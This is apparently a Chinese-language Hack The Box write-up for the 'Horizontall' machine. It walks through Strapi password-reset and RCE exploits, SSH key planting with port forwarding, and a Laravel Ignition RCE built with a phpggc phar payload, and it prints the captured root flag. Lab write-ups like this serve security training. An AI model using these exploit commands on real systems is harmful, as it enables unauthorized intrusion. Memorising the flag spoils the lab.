HTB-Horizontall

由 admin 发布

Horizontall

Data: August 31, 2021
Level: Easy
Summarize: 1、js 得到子域名
2、jwt 得到 rce strapi
3、ssh端口转发
4、Laravel V8 rce
Tags: Laravel, 端口转发

端口扫描

PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

在 js 文件中得到了一个子域名

Untitled

exp利用

Untitled

https://www.exploit-db.com/exploits/50239

https://www.exploit-db.com/exploits/50237

strapi

$ netstat -antlp
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:1337          0.0.0.0:*               LISTEN      1789/node /usr/bin/ 
tcp        0      0 127.0.0.1:8000          0.0.0.0:*               LISTEN      -

本地还开放了 8000 1337 端口

curl 127.0.0.1:8000

Untitled

正在运行 Laravel v8

使用 ssh 将端口转发出来

在用户家目录创建 .ssh kal 生成 authorized_keys 传至主机

➜ .ssh cat id_rsa.pub > authorized_keys

端口转发

ssh -i ~/.ssh/id_rsa -L 8000:127.0.0.1:8000 strapi@horizontall.htb

Root

➜  phpggc git:(master) php -d'phar.readonly=0' ./phpggc --phar phar -o /tmp/exploit.phar --fast-destruct monolog/rce1 system "cat /root/root.txt"
➜  phpggc git:(master) python3 ../laravel-exploits/laravel-ignition-rce.py http://localhost:8000/ /tmp/exploit.phar                              
+ Log file: /home/developer/myproject/storage/logs/laravel.log
+ Logs cleared
+ Successfully converted to PHAR !
+ Phar deserialized
--------------------------
d81660812e51818997acccae1f11ef9b
--------------------------
+ Logs cleared

参考

Strapi CVE-2019-18818 password reset vulnerability

Laravel V8 RCE


暂无评论

发表评论